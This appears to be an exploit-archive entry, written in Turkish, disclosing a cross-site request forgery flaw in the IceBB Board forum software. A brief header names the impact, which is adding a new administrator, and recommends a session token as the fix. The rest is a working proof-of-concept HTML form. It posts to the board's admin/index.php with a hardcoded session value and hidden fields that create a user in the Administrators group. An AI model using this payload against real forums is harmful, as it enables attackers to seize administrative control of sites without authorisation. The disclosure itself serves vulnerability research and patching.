< ------------------- header data start ------------------- >

#############################################################

# Application Name : IceBB Board

# vulnerable Type : XSRF

# Infection : Yeni admin eklenebilir ..!

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir ..

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >



<form action=http://demo.opensourcecms.com/icebb/admin/index.php method=post name=adminfrm>
<input type=hidden name=s value=1bc91376b5f2898f4320e7b17efe9033 />
<input type=hidden name=act value=users />
<input type=hidden name=func value=new />
<input type=hidden name=submit value=1 />
<input type=text name=username value=Kullanici Adi class=textbox size=30 /><br>
<input type=password name=password value=Sifre class=textbox size=30 /><br>
<input type=text name=email value=[email protected] class=textbox size=30 /><br>
<select name=group class=dropdown>
<option value=1>Administrators</option>
<option value=2>Members</option>
<option value=6>Moderators</option>
</select><br>
<input type=submit value=Kayitla class=button />
</form>

< -- bug code end of -- >